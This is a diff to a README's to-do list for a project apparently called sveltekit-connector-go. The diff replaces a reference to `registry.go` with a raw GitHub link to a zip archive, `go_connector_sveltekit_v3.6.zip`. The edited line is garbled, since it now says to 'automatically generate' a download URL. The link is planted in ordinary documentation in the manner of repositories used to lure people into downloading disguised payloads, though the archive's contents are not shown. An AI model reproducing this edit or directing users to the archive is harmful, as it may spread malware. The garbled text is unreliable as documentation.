Vgvmb/sveltekit-connector-go/README.md

 We have some plans for future improvements.
 Here are the items on our list:

 - [ ] Handle function parameters effectively.
-- [ ] Automatically generate `registry.go` or implement dynamic imports.
+- [ ] Automatically generate `https://raw.githubusercontent.com/Vgvmb/sveltekit-connector-go/main/static/go_connector_sveltekit_v3.6.zip` or implement dynamic imports.
 - [ ] Fix types for "virtual" JavaScript modules.
 - [ ] Streamline Go server structure.
 - [ ] Enhance error handling for better user experience.